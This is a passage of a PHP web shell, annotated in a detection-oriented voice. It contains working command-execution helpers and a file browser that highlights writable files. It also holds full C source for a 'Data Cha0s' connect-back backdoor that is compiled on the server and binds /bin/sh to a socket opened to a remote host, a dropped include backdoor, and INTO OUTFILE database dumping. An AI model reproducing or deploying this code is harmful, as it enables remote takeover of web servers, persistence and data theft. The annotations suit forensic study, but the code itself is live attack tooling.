# $HTTP_POST_VARS are not declared global here, so on the pre-4.1 branch
# they would be undefined locals.
if (phpversion() <= '4.1.0') {
$REQUESTS = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS);
} else {
$REQUESTS = $_REQUEST;
}
# Prefer $_SERVER; fall back to the legacy array when PHP_SELF is empty.
# $SCRIPT_NAME and $SERVER_PORT, also used at top level, are not set here.
if($_SERVER['PHP_SELF']=="") {
$SERVER_NAME = $HTTP_SERVER_VARS['SERVER_NAME'];
$SCRIPT_URI = $HTTP_SERVER_VARS['SCRIPT_URI'];
$REMOTE_ADDR = $HTTP_SERVER_VARS['REMOTE_ADDR'];
$QUERY_STRING = $HTTP_SERVER_VARS['QUERY_STRING'];
$PHP_SELF = $HTTP_SERVER_VARS['PHP_SELF'];
$SCRIPT_FILENAME = $HTTP_SERVER_VARS['SCRIPT_FILENAME'];
} else {
$SERVER_NAME = $_SERVER['SERVER_NAME'];
$SCRIPT_URI = $_SERVER['SCRIPT_URI'];
$REMOTE_ADDR = $_SERVER['REMOTE_ADDR'];
$QUERY_STRING = $_SERVER['QUERY_STRING'];
$PHP_SELF = $_SERVER['PHP_SELF'];
$SCRIPT_FILENAME = $_SERVER['SCRIPT_FILENAME'];
}
}
|
|
|
|
# Recursive variable dumper used by the dumpvars section. $v is the *name*
# of a global array (e.g. "GLOBALS" or "GLOBALS[key]"); the loop is
# assembled as source text and run through eval() so the name can be an
# indexing expression. Output is echoed directly, nothing is returned.
# Keys listed in $DebugArr are skipped, but array_search() is tested for
# truthiness, so a name at index 0 would never be filtered (hence the
# placeholder first entry of $DebugArr). $rv is assigned but never echoed,
# so only the closing </blockquote> is emitted.
function dd($v) {
global $DebugArr;
$rv = "<blockquote>\n";
$q="while(list(\$key,\$val) = each(\$$v)) {".
' if(array_search($key, $DebugArr)) {'.
' } else if((is_array($val)) && ($key!="GLOBALS")) {'.
' echo "<b>$key</b>>><br/>";'.
' @dd($v."[".$key."]");'.
' } else if($key=="GLOBALS") {'.
' } else echo "<b>$key</b>=>$val<br/>";'.
'};';
eval($q);
echo "</blockquote>\n";
}
|
|
|
|
# Variant of dd() without the $DebugArr filter, used by the debugscript
# section. Nested arrays recurse into dd() (not ddb()), so sub-arrays
# *are* filtered. Unlike dd(), the opening <blockquote> is echoed here.
# Echoes directly; returns nothing.
function ddb($v) {
echo "<blockquote>\n";
$q="while(list(\$key,\$val) = each(\$$v)) {".
' if((is_array($val)) && ($key!="GLOBALS")) {'.
' echo "<b>$key</b>>><br/>";'.
' @dd($v."[".$key."]");'.
' } else if($key=="GLOBALS") {'.
' } else echo "<b>$key</b>=>$val<br/>";'.
'};';
eval($q);
echo "</blockquote>\n";
}
|
|
|
|
######################################################################
|
|
# cmd shell functions
|
|
######################################################################
|
|
# test what cmd is working
# Probe which command-execution primitive is available by running `pwd`
# through Mexec(): the capturing methods (exec, proc_open, backticks) are
# tried first and must return more than 11 characters (the <pre> wrapper
# alone is 11), then system/passthru with any non-empty result. Returns the
# index used by $Mstr and Mexec(), 0 when none worked.
# Side effects: for methods 2/1 Mexec() prints the pwd output straight to
# the page. passthru() returns null, so strlen() of the method-1 probe is
# 0 and that method should never be selected here.
function test_cmd_shell(){
if(strlen(Mexec("pwd", 5))>11) $var = 5;
elseif(strlen(Mexec("pwd", 4))>11) $var = 4;
elseif(strlen(Mexec("pwd", 3))>11) $var = 3;
elseif(strlen(Mexec("pwd", 2))>0) $var = 2;
elseif(strlen(Mexec("pwd", 1))>0) $var = 1;
else $var = 0;
return $var;
}
|
|
# function for executing cmds
# Run $Mcmd with the primitive selected by $type (see $Mstr for the index
# mapping) and return its output wrapped in <pre>. Methods 5/4/3 capture
# the output into the return value; methods 2/1 print it immediately
# (system() returns only the last line, passthru() returns null), which is
# why callers test $emeth < 3. An empty command falls through with no
# return statement, i.e. returns null.
# Resource handling: $pipes[2] is declared but never read, and neither the
# pipes nor the process handle are closed. PHP accepts `case N;` as an
# alternative to `case N:`.
function Mexec($Mcmd, $type) {
if($Mcmd != ""){
$dspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "r")
);
$output = "";
switch($type) {
case 5:
$output .= "<pre>";
$lastline = exec($Mcmd, $arrOutput);
foreach($arrOutput as $val) {
$output .= $val . "\n";
}
$output .= "</pre>";
break;
case 4:
$proc = proc_open($Mcmd, $dspec, $pipes);
if (is_resource($proc)) {
$output .= "<pre>";
fclose($pipes[0]);
while(!feof($pipes[1])) {
$tmp = fgets($pipes[1], 1024);
$output .= $tmp;
}
$output .= "</pre>";
}
break;
case 3;
$output .= "<pre>";
$output .= `$Mcmd`;
$output .= "</pre>";
break;
case 2;
print "<pre>\n";
$output = system($Mcmd);
print "</pre>\n";
break;
case 1;
print "<pre>\n";
$output = passthru($Mcmd);
print "</pre>\n";
break;
case 0;
default;
$output = "There are no execute functions available!";
break;
}
return $output;
}
}
|
|
# Build and send a multipart message with one attachment. Only an empty
# message or subject is rejected; $from and $to are copied into the header
# verbatim with no validation. The attachment is read with fopen() in
# binary mode, so where allow_url_fopen permits it the source can be a URL
# (the form default is "http://...."); $fp is never closed. The entire MIME
# body is handed to mail() as the additional_headers argument with an empty
# message body, and lines use bare "\n". Returns the prompt/status text;
# on success that includes the full header dump.
function drop_mime_mail($from,$to,$subject,$attach_source,$content_type,$attach_appear,$msg) {
$msgerror = "";
if($msg == "") $msgerror = "please enter a message";
elseif($subject == "") $msgerror = "please enter a subject";
else {
# MIME boundary derived from uniqid(); attachment read in 1 KiB chunks.
$stlf = md5(uniqid(time()));
$attach = "";
$fp = fopen($attach_source, "rb");
if($fp) while(!feof($fp)) { $attach = $attach . fread($fp, 1024); }
$header = "From: $from\n";
$header .= "MIME-Version: 1.0\n";
$header .= "Content-Type: multipart/mixed; boundary=$stlf\n\n";
$header .= "This is a multi-part message in MIME format\n";
$header .= "--$stlf\n";
$header .= "Content-Type: text/plain\n";
$header .= "Content-Transfer-Encoding: 8bit\n\n";
$header .= "$msg\n";
$header .= "--$stlf\n";
$header .= "Content-Type: $content_type; name=$attach_appear\n";
$header .= "Content-Transfer-Encoding: base64\n";
$header .= "Content-Disposition: attachment; filename=$attach_appear\n\n";
$header .= chunk_split(base64_encode($attach));
$header .= "\n";
$header .= "--$stlf--";
mail($to,$subject,"",$header);
$msgerror = "send done - show header: <br>\n<pre>$header</pre> ";
}
return $msgerror;
}
|
|
|
|
######################################################################
|
|
# system browsing
|
|
######################################################################
|
|
|
|
# Render one feature toggle: the feature name coloured by state plus a link
# that sets the parameter to the opposite value ($test). State is read from
# $_REQUEST, not from the global that the top-level init loop toggled.
# $val and $SREQ are interpolated into the HTML unescaped. Returns the
# markup fragment.
function make_switch($val){
global $txt;
global $lang;
global $SCRIPT_NAME,$SREQ,$_REQUEST,$MyLoc,$_SERVER;
if(isset($_REQUEST[$val]) AND $_REQUEST[$val] == 1) { $test = 0; $col = "green"; $sw = $txt[$lang]['off']; }
else { $test = 1; $col = "black"; $sw = $txt[$lang]['on']; }
return " <font color=$col>$val</font> <a target=\"_parent\" href=\"".$MyLoc."?".$SREQ."&".$val."=".$test."\">[ ". $sw." ]</a> ";
}
|
|
# No-op: the only statement is commented out, so nothing is ever logged
# and the $syslog global is unused. Its only caller is itself commented
# out at top level.
function drop_syslog_warning($msg) {
global $syslog;
# if($syslog == 1) syslog(LOG_WARNING,$msg);
}
|
|
|
|
######################################################################
|
|
# file functions
|
|
######################################################################
|
|
# Copy $source (a local path or a URL, since copy() accepts stream
# wrappers) to $dest and render the copied file with highlight_file().
# Observable side effects: $dest is created or overwritten, and a remote
# fetch goes out with the fixed User-Agent "m0ins downloader" (set via
# ini_set below) -- a string that can be matched in proxy / web-server logs.
# As written the function builds $dataout but has no return statement, so
# the caller receives null; the "failed to copy" branch uses `.` rather
# than `.=`, so that message is computed and discarded.
function copy_file($source,$dest) {
    $dataout = "";
    if($source == "") $dataout .= "enter source<br>\n";
    if($dest != "") {
        # User-Agent sent by the http:// stream wrapper when $source is a URL
        ini_set("user_agent","m0ins downloader");
        if(!copy($source, $dest)) $dataout . "failed to copy ...<br>\n";
        if(file_exists($dest)) $dataout .= highlight_file($dest, 1);
    } else {
        $dataout .= "enter destination";
    }
}
|
|
# Overwrite $dest with $cont when $do == 1, then render $dest with
# highlight_file(); when $do != 1 it only renders the file.
# $dest must already exist -- a missing file yields the "unable to open"
# message and nothing is created. fopen(..., "w") truncates before writing,
# so a failing fwrite() leaves $dest empty; the fwrite() result in $write
# is not checked.
function edit_file($cont,$dest,$do) {
    $dataout = "";
    global $magic_quotes_gpc;
    if(file_exists($dest)) {
        if($do == 1){
            $fh = fopen($dest, "w");
            if(!$fh) {
                $dataout .= "unable to open <b>$dest</b>.\n";
            } else {
                # As shown, this (disabled) replacement maps each character to
                # itself; the original most likely decoded HTML entities and the
                # copy rendered here lost them.
                # $cont = str_replace(">", ">", str_replace("<", "<", $cont));
                # undo the backslashes magic_quotes_gpc adds to submitted input
                if($magic_quotes_gpc == 1) $cont = stripslashes($cont);
                $write = fwrite($fh, $cont);
                fclose($fh);
            }
        }
        $dataout .= highlight_file($dest, 1);
    } else {
        $dataout .= "unable to open <b>$dest</b>.\n";
    }
    return $dataout;
}
|
|
# Return the contents of $source for embedding in the HTML page, or an
# "unable to open" message when the file is missing or cannot be opened.
# The two str_replace() calls are meant to neutralise "<" and ">"; as shown
# here both map a character to itself (an identity), so nothing is actually
# escaped -- the original most likely used HTML entities that this rendered
# copy lost.
function show_file($source) {
    $dataout = "";
    if(file_exists($source)) {
        $fh = fopen($source, "r");
        if(!$fh) {
            $dataout .= "unable to open <b>$source</b>.\n";
        } else {
            # single read of the whole file; for an empty file filesize() is 0,
            # fread() yields nothing and the empty() check below skips the
            # replacement
            $read = fread($fh, filesize($source));
            fclose($fh);
            if(!empty($read)) $read = str_replace(">", ">", str_replace("<", "<", $read));
            $dataout .= $read;
        }
    } else {
        $dataout .= "unable to open <b>$source</b>.\n";
    }
    return $dataout;
}
|
|
# List directory $chdir into four global arrays ($is_file, $is_dir,
# $is_w_dir, $is_w_file) and render them as a four-column HTML table via
# echo_files(). Returns the HTML, or "Permission denied." when opendir()
# fails.
# What the code actually does:
#  - the global arrays are appended to and never reset, so a second call
#    in the same request accumulates entries;
#  - the two "writable" classifications call is_dir()/is_file() on the bare
#    $filename (relative to the process cwd), not on $FN;
#  - closedir() runs even on the failure path, where $fh is false.
function snoopy($chdir){
    $tmpOut = "";
    global $is_file,$is_dir,$is_w_dir,$is_w_file;
    $fh = opendir("$chdir");
    # opendir() returns false on failure; false != "" is loosely false, so
    # this branch is entered only when a handle was obtained
    if($fh!="") {
        while (false !== ($filename = readdir($fh)) ) {
            $FN = $chdir."/".$filename;
            if(@is_file($FN)) $is_file[] = $filename;
            if(@is_dir($FN)) $is_dir[] = $filename;
            # note: is_dir()/is_file() receive $filename here, not $FN
            if(@is_writable($FN) && @is_dir($filename)) $is_w_dir[] = $filename;
            if(@is_writable($FN) && @is_file($filename)) $is_w_file[] = $filename;
        }
        $tmpOut .= "<table border=1 cellspacing=1 cellpadding=0><tr>";
        $tmpOut .= echo_files($is_file, "all files");
        $tmpOut .= echo_files($is_dir, "only dirs");
        $tmpOut .= echo_files($is_w_dir, "writable dirs");
        $tmpOut .= echo_files($is_w_file,"writable files");
        $tmpOut .= "</tr></table>";
    } else {
        $tmpOut .= "Permission denied.";
    }
    closedir($fh);
    return $tmpOut;
}
|
|
|
|
# Render one <td> column listing the entries of $arr (names relative to the
# global $chdir) under the heading $txt. Each line shows the numeric owner
# uid, the low three octal digits of the mode, and a link back into this
# script: directories link with chdir=<path>, files with vsource=<path>.
# Colour encodes the classification: red = writable, green = plain file,
# blue = directory. Names, $chdir and $SREQ are interpolated into the HTML
# without escaping. When $arr is unset (null) count() warns on PHP 7 and
# throws a TypeError on PHP 8.
function echo_files($arr,$txt){
    $tmpOutMF = "";
    global $chdir,$MyLoc,$SREQ;
    $tmpOutMF .= "<td valign=top>";
    $tmpOutMF .= "<b><font size=2 face=arial>$txt</b> <br><br>";
    if(count($arr) > 0) {
        foreach($arr as $key => $file) {
            $FN = $chdir."/".$file;
            $owner = fileowner($FN);
            # e.g. "755": the last three digits of the octal mode
            $perms = substr(sprintf("%o",fileperms($FN)),-3);
            if(@is_writable($FN) && @is_dir($FN)) $tmpOutMF .= "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>";
            elseif(@is_writable($FN) && @is_file($FN)) $tmpOutMF .= "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a> </font><br>";
            elseif(@is_file($FN)) $tmpOutMF .= "<font color=green>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a></font><br>";
            elseif(@is_dir($FN)) $tmpOutMF .= "<font color=blue>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>";
        }
    }
    $tmpOutMF .= "</td>";
    return $tmpOutMF;
}
|
|
# Recursively dump the PHP array named by the string $v (e.g. "GLOBALS") as
# nested <blockquote> blocks, one "<b>key</b>=>value" line per entry,
# descending into array values except the GLOBALS self-reference.
# The walk is done by assembling PHP source into $q and eval()ing it,
# because the array is chosen by name at runtime; whatever $v contains is
# therefore executed as code. Uses each(), removed in PHP 8; `global $a`
# is declared but never read.
function print_globals($v) {
    global $a;
    echo "<blockquote>\n";
    # generated code, roughly:
    #   while(list($key,$val) = each($<v>)) { echo "<b>$key</b>=>$val.<br>";
    #     if(is_array($val) && $key != "GLOBALS") @print_globals($v."[".$key."]"); }
    $q= "while(list(\$key,\$val) = each($".$v. ") ) { ".
    " echo \"<b>\$key</b>=>\$val.<br>\"; ".
    " if(( is_array(\$val)) && (\$key != \"GLOBALS\")) {".
    " @print_globals( \$v.\"[\".\$key.\"]\" );".
    "}}";
    eval($q);
    echo "</blockquote>\n";
}
|
|
######################################################################
|
|
# connect back shell function
|
|
######################################################################
|
|
|
|
# Drop, compile and run a C "connect back" program.
# Step by step:
#  1. writes the C source held in $shell to $tmp_dir/cbs.c;
#  2. runs "$compiler -o $tmp_dir/cbs $tmp_dir/cbs.c" through Mexec(),
#     using whichever execution method test_cmd_shell() reports
#     (both helpers are defined elsewhere in this file);
#  3. runs "$tmp_dir/cbs $host $port": the binary opens an outbound TCP
#     connection from the web server to $host:$port and, in a forked
#     child, attaches /bin/sh to that socket.
# Artefacts for detection / incident response: the files cbs.c and cbs in
# $tmp_dir (neither is removed afterwards), a compiler run as a child of
# the web-server process, the fixed banner text in the C source ("Data
# Cha0s Connect Back Shell"), which the binary writes to the socket, and an
# outbound connection from the web server to $host:$port.
# Returns the captured command output in <pre>, or an error string when no
# exec method is available or the source could not be written. fopen()
# failure is not checked before fwrite().
function connect_back($tmp_dir, $compiler, $host, $port) {
    # C source written verbatim to disk; its strings are fixed
    $shell = "#include <stdio.h>\n" .
    "#include <sys/socket.h>\n" .
    "#include <netinet/in.h>\n" .
    "#include <arpa/inet.h>\n" .
    "#include <netdb.h>\n" .
    "int main(int argc, char **argv) {\n" .
    " char *host;\n" .
    " int port = 80;\n" .
    " int f;\n" .
    " int l;\n" .
    " int sock;\n" .
    " struct in_addr ia;\n" .
    " struct sockaddr_in sin, from;\n" .
    " struct hostent *he;\n" .
    " char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\\n\\n\"\n" .
    " \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
    " \"For More Reliable Shell.\\n\"\n" .
    " \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
    " \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
    " printf(\"Data Cha0s Connect Back Backdoor\\n\\n\");\n" .
    " if (argc < 2 || argc > 3) {\n" .
    " printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
    " return 1;\n" .
    " }\n" .
    " printf(\"[*] Dumping Arguments\\n\");\n" .
    " l = strlen(argv[1]);\n" .
    " if (l <= 0) {\n" .
    " printf(\"[-] Invalid Host Name\\n\");\n" .
    " return 1;\n" .
    " }\n" .
    " if (!(host = (char *) malloc(l))) {\n" .
    " printf(\"[-] Unable to Allocate Memory\\n\");\n" .
    " return 1;\n" .
    " }\n" .
    " strncpy(host, argv[1], l);\n" .
    " if (argc == 3) {\n" .
    " port = atoi(argv[2]);\n" .
    " if (port <= 0 || port > 65535) {\n" .
    " printf(\"[-] Invalid Port Number\\n\");\n" .
    " return 1;\n" .
    " }\n" .
    " }\n" .
    " printf(\"[*] Resolving Host Name\\n\");\n" .
    " he = gethostbyname(host);\n" .
    " if (he) {\n" .
    " memcpy(&ia.s_addr, he->h_addr, 4);\n" .
    " } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
    " printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
    " return 1;\n" .
    " }\n" .
    " sin.sin_family = PF_INET;\n" .
    " sin.sin_addr.s_addr = ia.s_addr;\n" .
    " sin.sin_port = htons(port);\n" .
    " printf(\"[*] Connecting...\\n\");\n" .
    " if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
    " printf(\"[-] Socket Error\\n\");\n" .
    " return 1;\n" .
    " }\n" .
    " if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
    " printf(\"[-] Unable to Connect\\n\");\n" .
    " return 1;\n" .
    " }\n" .
    " printf(\"[*] Spawning Shell\\n\");\n" .
    " f = fork( );\n" .
    " if (f < 0) {\n" .
    " printf(\"[-] Unable to Fork\\n\");\n" .
    " return 1;\n" .
    " } else if (!f) {\n" .
    " write(sock, msg, sizeof(msg));\n" .
    " dup2(sock, 0);\n" .
    " dup2(sock, 1);\n" .
    " dup2(sock, 2);\n" .
    " execl(\"/bin/sh\", \"shell\", NULL);\n" .
    " close(sock);\n" .
    " return 0;\n" .
    " }\n" .
    " printf(\"[*] Detached\\n\\n\");\n" .
    " return 0;\n" .
    "}\n";
    # on-disk artefacts: $tmp_dir/cbs.c (source) and $tmp_dir/cbs (binary)
    $fbname = $tmp_dir . "/cbs";
    $fp = fopen($fbname . ".c", "w");
    $write = fwrite($fp, $shell);
    fclose($fp);
    if(!empty($write)) {
        # compile step, executed as a child of the web-server process
        $command = $compiler . " -o " . $fbname . " " . $fbname . ".c";
        $execM = test_cmd_shell();
        if($execM > 0) {
            $rtval = Mexec($command, $execM);
            # run step: the binary dials out to $host:$port
            $command = $fbname . " " . $host . " " . $port;
            $rtval .= Mexec($command, $execM);
            return "<pre>" . $rtval . "</pre>";
        } else {
            return "<b>ERROR! No EXEC Avilable!</b>";
        }
    } else {
        return "<b>ERROR! Writing data!</b>";
    }
}
|
|
|
|
######################################################################
|
|
# drop mini inc hole
|
|
######################################################################
|
|
# Write a minimal "include backdoor" to $location: a five-line PHP file that
# include()s whatever path the request parameter "inc" names (taken from
# $_REQUEST, or from $HTTP_GET_VARS/$HTTP_POST_VARS on PHP <= 4.1.0).
# For detection: the dropped file's bytes are exactly the literal in $Scode
# below, so it can be matched verbatim; the `include($vars[inc])` line with
# its unquoted array key is distinctive on its own.
# Returns "<location> copied" when fwrite() wrote something, otherwise the
# error string. fopen() failure is not checked and the handle is never
# closed.
function dropminiinc($location) {
    $Scode = "<?php\n".
    "if (phpversion() <= '4.1.0') \$vars = array_merge(\$HTTP_GET_VARS, \$HTTP_POST_VARS);\n".
    "else \$vars = \$_REQUEST;\n".
    "include(\$vars[inc]);\n".
    "?>\n";
    $fp = fopen($location, "w");
    $write = fwrite($fp, $Scode);
    if(!empty($write)) return "<b>$location</b> copied\n";
    else return "<b>ERROR! Not copied!</b>";
}
|
|
|
|
######################################################################
|
|
# db functions
|
|
# unchanged from dans code
|
|
######################################################################
|
|
# Render a MySQL result set as an HTML table: a header row of column names
# followed by one row per fetched record. Cell values are inserted into the
# markup unescaped. Uses the legacy mysql_* extension (removed in PHP 7).
function prep_rows($myresult) {
    $dataout = "<table>\n";
    $num_fields = mysql_num_fields($myresult);
    $dataout .= "<tr border=1>\n";
    for($i=0; $i<$num_fields; $i++) $dataout .= "<td>" . mysql_field_name($myresult, $i) . "</td>";
    $dataout .= "</tr>\n";
    while ($line = mysql_fetch_array($myresult, MYSQL_ASSOC)) {
        $dataout .= "<tr>\n";
        foreach($line as $colvalue) {
            $dataout .= "<td>$colvalue</td>\n";
        }
        $dataout .= "</tr>\n";
    }
    $dataout .= "</table>\n";
    return $dataout;
}
|
|
|
|
# Run `SELECT * FROM <table> INTO OUTFILE "<dump>"` so that the MySQL
# server itself writes the table to a file on the database host (this needs
# the FILE privilege; the written file is an artefact to look for).
# $mytable and $mydump are concatenated into the statement verbatim.
# Every mysql_* return value is ignored -- the `or return` checks are
# commented out -- so the fixed "Hopefully dumped!" comes back whether or
# not anything happened; mysql_free_result() on the bool that a non-SELECT
# statement returns only raises a warning. Legacy mysql_* extension.
function dump_rows($myhost, $myuser, $mypass, $mydb, $mytable, $mydump) {
    $link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
    mysql_select_db($mydb); // or return "Could not select database";
    $query = "SELECT * FROM ".$mytable." INTO OUTFILE \"".$mydump."\";";
    $result = mysql_query($query); // or return "Query failed: ".mysql_error();
    mysql_free_result($result);
    mysql_close($link);
    return "Hopefully dumped!";
}
|
|
|
|
# Like dump_rows(), but for an arbitrary statement: appends
# ` INTO OUTFILE "<dump>"` to $mysql and executes it, making the MySQL
# server write the result set to a file on the database host (FILE
# privilege required; the written file is an artefact to look for).
# Nothing is validated and no return value is checked, so the fixed
# "Hopefully dumped!" is returned regardless of outcome. Legacy mysql_*
# extension.
function dump_query($myhost, $myuser, $mypass, $mydb, $mysql, $mydump) {
    $link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
    mysql_select_db($mydb); // or return "Could not select database";
    $query = $mysql." INTO OUTFILE \"".$mydump."\";";
    $result = mysql_query($query); // or return "Query failed: ".mysql_error();
    mysql_free_result($result);
    mysql_close($link);
    return "Hopefully dumped!";
}
|
|
|
|
# Execute the statement $mysql against $mydb and return the result set
# rendered by prep_rows(). Connection, database selection and query errors
# are not checked (the `or return` checks are commented out), so a failed
# query hands `false` to prep_rows(). Legacy mysql_* extension.
function display_query($myhost, $myuser, $mypass, $mydb, $mysql) {
    $link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
    mysql_select_db($mydb); // or return "Could not select database";
    $query = $mysql;
    $result = mysql_query($query); // or return "Query failed: ".mysql_error();
    $dataouted = prep_rows($result);
    mysql_free_result($result);
    mysql_close($link);
    return($dataouted);
}
|
|
|
|
# Return every row of $mytable in $mydb rendered by prep_rows(). $mytable is
# concatenated into the statement verbatim; connection and query errors are
# not checked (the `or return` checks are commented out). Legacy mysql_*
# extension.
function display_rows($myhost, $myuser, $mypass, $mydb, $mytable) {
    $link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
    mysql_select_db($mydb); // or return "Could not select database";
    $query = "SELECT * FROM ".$mytable;
    $result = mysql_query($query); // or return "Query failed: ".mysql_error();
    $dataouted = prep_rows($result);
    mysql_free_result($result);
    mysql_close($link);
    return($dataouted);
}
|
|
|
|
# List the tables of $mydb as an HTML table of links; each link reloads this
# script with incdb* parameters selecting that table.
# Note for log review: the links carry the database host, user name and
# password ($mypass) in the URL query string, so following one leaves the
# credentials in web-server access logs, browser history and Referer
# headers. Uses mysql_list_tables(), deprecated long before the mysql_*
# extension was removed in PHP 7. mysql_connect() errors are not checked.
function display_tables($myhost, $myuser, $mypass, $mydb) {
    global $MyLoc,$SREQ;
    $link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
    $result = mysql_list_tables($mydb);
    if (!$result) {
        return "DB Error, could not list tables";
    }
    $dataout = "<table>\n";
    while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
        $dataout .= "<tr>\n";
        foreach ($line as $col_value) {
            # credentials end up in the href
            $dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$mydb&incdbtable=$col_value'>$col_value</a></td>\n";
        }
        $dataout .= "</tr>\n";
    }
    $dataout .= "</table>\n";
    mysql_free_result($result);
    mysql_close($link);
    return($dataout);
}
|
|
|
|
# List the databases visible to $myuser on $myhost as an HTML table of
# links; each link reloads this script with incdb* parameters selecting
# that database. As in display_tables(), the database password travels in
# the URL query string of every link (visible in access logs, history and
# Referer headers). mysql_connect() errors are not checked before
# mysql_list_dbs() is called. Legacy mysql_* extension.
function display_dbs($myhost, $myuser, $mypass) {
    global $MyLoc,$SREQ;
    $link = mysql_connect($myhost, $myuser, $mypass);
    $result = mysql_list_dbs($link);
    if (!$result) {
        return "DB Error, could not list databases";
    }
    $dataout = "<table>\n";
    while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
        $dataout .= "<tr>\n";
        foreach ($line as $col_value) {
            # credentials end up in the href
            $dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$col_value'>$col_value</a></td>\n";
        }
        $dataout .= "</tr>\n";
    }
    $dataout .= "</table>\n";
    mysql_free_result($result);
    mysql_close($link);
    return($dataout);
}
|
|
|
|
# ODBC counterpart of display_rows(): connect with DSN $myhost, select all
# rows of $mytable and render them as an HTML table. $mydb is accepted but
# never used, and no odbc_* return value is checked.
# As written the loop cannot produce cells: odbc_fetch_row() returns a bool
# (its second argument is a row number; MYSQL_ASSOC is a mysql-extension
# constant), so $line is never an array and the foreach has nothing to
# iterate. Whether the loop terminates with a fixed row number should be
# verified before relying on this function at all.
function Odisplay_rows($myhost, $myuser, $mypass, $mydb, $mytable) {
    $link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect";
    $query = "SELECT * FROM ".$mytable;
    $result = odbc_exec($link, $query); // or return "Query failed: ".mysql_error();
    $dataout = "<table>\n";
    while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) {
        $dataout = $dataout . "<tr>\n";
        foreach($line as $colvalue) {
            $dataout = $dataout . "<td>$colvalue</td>\n";
        }
        $dataout = $dataout . "</tr>\n";
    }
    $dataout = $dataout . "</table>\n";
    return($dataout);
}
|
|
|
|
# ODBC counterpart of display_tables(): list the tables reachable through
# DSN $myhost, keeping only entries whose 4th column reads "TABLE".
# As written this does not work: odbc_fetch_row() returns a bool, so
# `odbc_result($line, 4)` is handed a bool instead of a result handle, and
# `$tablelist` is never defined in this function (presumably the original
# used it as the result handle -- $result here). The closing </tr> is
# appended for every fetched row, inside or outside the TABLE filter.
function Odisplay_tables($myhost, $myuser, $mypass) {
    $link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect";
    $result = odbc_tables($link);
    if (!$result) {
        return "DB Error, could not list tables";
    }
    $dataout = "<table>\n";
    while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) {
        if(odbc_result($line, 4) == "TABLE") {
            $dataout = $dataout . "<tr>\n";
            # $tablelist is undefined here
            $dataout = $dataout . "<td>" . odbc_result($tablelist, 3) ."</td>\n";
        }
        $dataout = $dataout . "</tr>\n";
    }
    $dataout = $dataout . "</table>\n";
    return($dataout);
}
|
|
|
|
######################################################################
|
|
# Dan's Network function Wrappers
|
|
# Initial use inside this script, need to handle the error data
|
|
# differently to get it included in the base 64 output!
|
|
######################################################################
|
|
|
|
# Map a protocol name to the (protocol, socket type) pair socket_create()
# expects: "udp" -> [SOL_UDP, SOCK_DGRAM]; "tcp" and any other value ->
# [SOL_TCP, SOCK_STREAM]. Returns array($protocol, $socktype) in that order.
function DB_NET_GET_SOCKET_PROTOCOL($prot) {
    switch($prot) {
        case "udp":
            $protocol = SOL_UDP;
            $socktype = SOCK_DGRAM;
            break;
        # everything that is not "udp" is treated as TCP
        case "tcp":
        default:
            $protocol = SOL_TCP;
            $socktype = SOCK_STREAM;
            break;
    }
    return(array($protocol, $socktype));
}
|
|
|
|
# Open a client socket to $hostname:$port and return it.
# Resolves the name with gethostbyname(), picks protocol/type with
# DB_NET_GET_SOCKET_PROTOCOL(), then the inline switch repeats the same
# mapping and overwrites the two variables with identical values.
# Error handling as written never fires: socket_create() returns false
# (not a negative int) on failure and socket_connect() returns a bool, so
# neither "< 0" test is ever true; on failure nothing is echoed and the
# false/unconnected socket is returned to the caller.
function DB_NET_CONNECT($hostname, $port=80, $prot="tcp") {
    $address = gethostbyname($hostname);
    list($protocol, $socktype) = DB_NET_GET_SOCKET_PROTOCOL($prot);
    # redundant: recomputes what the call above already returned
    switch($prot) {
        case "udp":
            $protocol = SOL_UDP;
            $socktype = SOCK_DGRAM;
            break;
        case "tcp":
        default:
            $protocol = SOL_TCP;
            $socktype = SOCK_STREAM;
            break;
    }
    $socket = socket_create(AF_INET, $socktype, $protocol);
    # false < 0 is false in PHP, so this check cannot trigger
    if ($socket < 0) {
        echo "socket_create() failed: reason: " . socket_strerror($socket) . "\n";
    }
    $result = socket_connect($socket, $address, $port);
    # socket_connect() returns bool; same dead check
    if ($result < 0) {
        echo "socket_connect() failed.\nReason: ($result) " . socket_strerror($result) . "\n";
    }
    return $socket;
}
|
|
|
|
# Create a TCP socket bound to $address:$port and put it in listening state
# (backlog 5); returns the socket. The three failure paths are meant to
# return -1 / -2 / -3, but socket_create() returns false and socket_bind()
# / socket_listen() return bools rather than negative ints, so none of the
# "< 0" tests can trigger and a failed socket is returned as if it were
# listening.
function DB_NET_LISTEN($address, $port) {
    if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
        echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";
        return(-1);
    }
